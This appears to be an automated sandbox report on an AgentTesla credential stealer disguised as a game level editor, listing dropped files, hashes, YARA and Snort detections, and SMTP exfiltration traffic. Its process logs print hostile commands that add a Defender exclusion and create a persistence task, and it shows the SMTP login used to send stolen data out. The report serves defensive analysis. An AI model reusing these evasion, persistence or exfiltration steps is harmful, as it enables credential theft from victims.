                                                                                                              SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuT4v
                                                                                                              MD5:6559A727DCAB13CBAB3D97E706C43B1B
                                                                                                              SHA1:4747A6D2674FC9EA3DB6EE83D3C6F2B144BDC06E
                                                                                                              SHA-256:0BC0C6681AAB8F0D889CDDB24AC2E725B1BEA9BB47912C597589FDDED659F15B
                                                                                                              SHA-512:262A1F7BD9CB90092FEAEFCF14426EF0301A0EC8F1139666E4CBCD7479C34CE92078CAFB07925581DC4F5F1E456A060F7A49A2D7E70A18881A3D78D9F6AC48CE
                                                                                                              Malicious:true
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Virustotal, Detection: 22%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Reconfirm The Details.doc, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:false
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                              C:\Users\user\AppData\Roaming\qjd4o4f4.25r\Chrome\Default\Cookies
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.7006690334145785
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                              MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                              SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                              SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                              SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\Documents\20211125\PowerShell_transcript.287400.wHqetafF.20211125200338.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5785
                                                                                                              Entropy (8bit):5.406946154604899
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZxj5NFqDo1Z5Zej5NFqDo1ZGqQCjZxj5NFqDo1ZVrSS5Zu:Z
                                                                                                              MD5:7B36232C034A7DE025889FAAB1C554E6
                                                                                                              SHA1:DE6A1B7FBC55790530B7EEA6F5504E1ECB0D5228
                                                                                                              SHA-256:C8D707AADE12C1B6A4B20AD335DB27F218843138DB93AB2A987C0553D2FEE5F8
                                                                                                              SHA-512:D0AED9613DEFF69B869E5F61A9A121C409824F7737F1E19CB5A1341E55EAFC81FE310BA9A92D845A7875A725C9D3E5B97E408DC920C9CB12CF886AC8798D350D
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125200339..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe..Process ID: 5776..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125200339..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe..**********************..Windows PowerShell transcript start..Start time: 20211125200707..Username: computer\user..RunAs User: computer\user.

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              File name:03SPwb995m.exe
                                                                                                              File size:777216
                                                                                                              MD5:815982590de5e574abb8a0310826e200
                                                                                                              SHA1:6c41343a2e25f932f901e53e615cc083209f6a65
                                                                                                              SHA256:56960095ea2eda1c680f9df0937a792e9bca7af4922931540688097e6d2a43bb
                                                                                                              SHA512:4c343183ec50c6887b758ed1fa40478bc87a0944792944d42c9978ebda94b08a9d2e3e77b039963bf0a3ec2d5090bbb7fba9cf0486ebe8c00ac393a2361fce98
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4beeae
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x619F0842 [Thu Nov 25 03:51:30 2021 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbee5c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x688 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbcf0c | 0xbd000 | False | 0.832854094329 | data | 7.79660930856 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x688 | 0x800 | False | 0.3447265625 | data | 3.60442370225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc0090 | 0x3f8 | data | |
RT_MANIFEST | 0xc0498 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright LiquidFyre Games, LLC 2009
Assembly Version | 1.0.0.0
InternalName | InternalApplicationIdentityHelp.exe
FileVersion | 1.0.0.0
CompanyName | LiquidFyre Games, LLC
LegalTrademarks |
Comments |
ProductName | MegaMan Level Editor
ProductVersion | 1.0.0.0
FileDescription | MegaMan Level Editor
OriginalFilename | InternalApplicationIdentityHelp.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-20:05:28.389248 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49833 | 587 | 192.168.2.4 | 208.91.199.223
11/25/21-20:05:31.967875 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49834 | 587 | 192.168.2.4 | 208.91.199.224

Network Port Distribution

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 20:05:26.861645937 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Nov 25, 2021 20:05:26.906301975 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Nov 25, 2021 20:05:30.558090925 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Nov 25, 2021 20:05:30.615698099 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 20:05:26.861645937 CET | 192.168.2.4 | 8.8.8.8 | 0xe8ba | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)
Nov 25, 2021 20:05:30.558090925 CET | 192.168.2.4 | 8.8.8.8 | 0xc36 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                      CName  Address         Type            Class
Nov 25, 2021 20:05:26.906301975 CET  8.8.8.8    192.168.2.4  0xe8ba    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:26.906301975 CET  8.8.8.8    192.168.2.4  0xe8ba    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:26.906301975 CET  8.8.8.8    192.168.2.4  0xe8ba    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:26.906301975 CET  8.8.8.8    192.168.2.4  0xe8ba    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:30.615698099 CET  8.8.8.8    192.168.2.4  0xc36     No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:30.615698099 CET  8.8.8.8    192.168.2.4  0xc36     No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:30.615698099 CET  8.8.8.8    192.168.2.4  0xc36     No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 20:05:30.615698099 CET  8.8.8.8    192.168.2.4  0xc36     No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)

SMTP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP         Commands
Nov 25, 2021 20:05:27.469840050 CET  587          49833      208.91.199.223  192.168.2.4     220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 20:05:27.470530033 CET  49833        587        192.168.2.4     208.91.199.223  EHLO 287400
Nov 25, 2021 20:05:27.620111942 CET  587          49833      208.91.199.223  192.168.2.4     250-us2.outbound.mailhostbox.com
                                                                                             250-PIPELINING
                                                                                             250-SIZE 41648128
                                                                                             250-VRFY
                                                                                             250-ETRN
                                                                                             250-STARTTLS
                                                                                             250-AUTH PLAIN LOGIN
                                                                                             250-AUTH=PLAIN LOGIN
                                                                                             250-ENHANCEDSTATUSCODES
                                                                                             250-8BITMIME
                                                                                             250 DSN
Nov 25, 2021 20:05:27.621449947 CET  49833        587        192.168.2.4     208.91.199.223  AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 20:05:27.771430969 CET  587          49833      208.91.199.223  192.168.2.4     334 UGFzc3dvcmQ6
Nov 25, 2021 20:05:27.923211098 CET  587          49833      208.91.199.223  192.168.2.4     235 2.7.0 Authentication successful
Nov 25, 2021 20:05:27.924423933 CET  49833        587        192.168.2.4     208.91.199.223  MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 20:05:28.074255943 CET  587          49833      208.91.199.223  192.168.2.4     250 2.1.0 Ok
Nov 25, 2021 20:05:28.074915886 CET  49833        587        192.168.2.4     208.91.199.223  RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 20:05:28.237390041 CET  587          49833      208.91.199.223  192.168.2.4     250 2.1.5 Ok
Nov 25, 2021 20:05:28.238054991 CET  49833        587        192.168.2.4     208.91.199.223  DATA
Nov 25, 2021 20:05:28.387465000 CET  587          49833      208.91.199.223  192.168.2.4     354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 20:05:28.390839100 CET  49833        587        192.168.2.4     208.91.199.223  .
Nov 25, 2021 20:05:28.640168905 CET  587          49833      208.91.199.223  192.168.2.4     250 2.0.0 Ok: queued as 27BF1D9D9E
Nov 25, 2021 20:05:29.978957891 CET  49833        587        192.168.2.4     208.91.199.223  QUIT
Nov 25, 2021 20:05:30.130351067 CET  587          49833      208.91.199.223  192.168.2.4     221 2.0.0 Bye
Nov 25, 2021 20:05:31.060530901 CET  587          49834      208.91.199.224  192.168.2.4     220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 20:05:31.061099052 CET  49834        587        192.168.2.4     208.91.199.224  EHLO 287400
Nov 25, 2021 20:05:31.211000919 CET  587          49834      208.91.199.224  192.168.2.4     250-us2.outbound.mailhostbox.com
                                                                                             250-PIPELINING
                                                                                             250-SIZE 41648128
                                                                                             250-VRFY
                                                                                             250-ETRN
                                                                                             250-STARTTLS
                                                                                             250-AUTH PLAIN LOGIN
                                                                                             250-AUTH=PLAIN LOGIN
                                                                                             250-ENHANCEDSTATUSCODES
                                                                                             250-8BITMIME
                                                                                             250 DSN
Nov 25, 2021 20:05:31.211307049 CET  49834        587        192.168.2.4     208.91.199.224  AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 20:05:31.359637976 CET  587          49834      208.91.199.224  192.168.2.4     334 UGFzc3dvcmQ6
Nov 25, 2021 20:05:31.507431030 CET  587          49834      208.91.199.224  192.168.2.4     235 2.7.0 Authentication successful
Nov 25, 2021 20:05:31.507930994 CET  49834        587        192.168.2.4     208.91.199.224  MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 20:05:31.659888029 CET  587          49834      208.91.199.224  192.168.2.4     250 2.1.0 Ok
Nov 25, 2021 20:05:31.660202980 CET  49834        587        192.168.2.4     208.91.199.224  RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 20:05:31.820298910 CET  587          49834      208.91.199.224  192.168.2.4     250 2.1.5 Ok
Nov 25, 2021 20:05:31.820674896 CET  49834        587        192.168.2.4     208.91.199.224  DATA
Nov 25, 2021 20:05:31.965879917 CET  587          49834      208.91.199.224  192.168.2.4     354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 20:05:31.968513966 CET  49834        587        192.168.2.4     208.91.199.224  .
Nov 25, 2021 20:05:32.216402054 CET  587          49834      208.91.199.224  192.168.2.4     250 2.0.0 Ok: queued as B79533A1B2D

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 20:03:31
Start date: 25/11/2021
Path: C:\Users\user\Desktop\03SPwb995m.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\03SPwb995m.exe"
Imagebase: 0x8f0000
File size: 777216 bytes
MD5 hash: 815982590DE5E574ABB8A0310826E200
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 20:03:37
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
Imagebase: 0x3a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 20:03:37
Start date: 25/11/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:03:37
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
Imagebase: 0xc30000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:03:38
Start date: 25/11/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:03:40
Start date: 25/11/2021
Path: C:\Users\user\Desktop\03SPwb995m.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\03SPwb995m.exe
Imagebase: 0x780000
File size: 777216 bytes
MD5 hash: 815982590DE5E574ABB8A0310826E200
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis

Executed Functions

APIs
• GetCurrentProcess.KERNEL32 ref: 02BBD2B0
• GetCurrentThread.KERNEL32 ref: 02BBD2ED
• GetCurrentProcess.KERNEL32 ref: 02BBD32A
• GetCurrentThreadId.KERNEL32 ref: 02BBD383
Memory Dump Source
• Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 09b9c6182af49382b7ebc19591939587768f67b7afdae23becf2ba27108845f9
• Instruction ID: 3b29ca78a6f371fa077cef25bc49d6749e6bb53ad7ca2d8dffa99527ec8eec5d
• Opcode Fuzzy Hash: 09b9c6182af49382b7ebc19591939587768f67b7afdae23becf2ba27108845f9
• Instruction Fuzzy Hash: 3C5146B0D006498FDB14CFA9D5487EEBBF4FF48318F2084A9E459A7350C7B95944CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB1AE
Memory Dump Source
• Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 72c452909229be9d9938b4f9d215c40cc7288823191f34c74b965f4074e62999
• Instruction ID: 0883fb6f75c7c88af4c7f8099d1020008502bc7f161f048268c06073d7dafa54
• Opcode Fuzzy Hash: 72c452909229be9d9938b4f9d215c40cc7288823191f34c74b965f4074e62999
• Instruction Fuzzy Hash: 3C7113B0A00B058FD725DF69D0447AAB7F5FF88308F10896DD49AD7A40DBB5E84A8F91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?), ref: 02BB5591
Memory Dump Source
• Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 0460e9b84e366a9e3a6a98275eae3b71a231749e95be71fcaa921aae4a84fd2e
                                                                                                                • Instruction ID: 67cc8fe0a00137fbffe59f87d019da9ea2c00a2b8be2cba49626156c43d54f2b
                                                                                                                • Opcode Fuzzy Hash: 0460e9b84e366a9e3a6a98275eae3b71a231749e95be71fcaa921aae4a84fd2e
                                                                                                                • Instruction Fuzzy Hash: C541E470C00618CFDB24DFA9C8447DEBBB9BF48304F64856AD409AB251D7B55986CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02BB5591
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: c79a260706592539fa8652d0a9cd694ed8ae8c017745730d825d62246d74da06
                                                                                                                • Instruction ID: c257bd7414a1d7afbb8c72e6b848fddb2e840b1db58902d9d5c97ca53bb1fb58
                                                                                                                • Opcode Fuzzy Hash: c79a260706592539fa8652d0a9cd694ed8ae8c017745730d825d62246d74da06
                                                                                                                • Instruction Fuzzy Hash: 4B41E3B0C00718CBDB24DFA9C8447DEBBB9BF48304F50856AD409AB255D7B56986CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BBD4FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
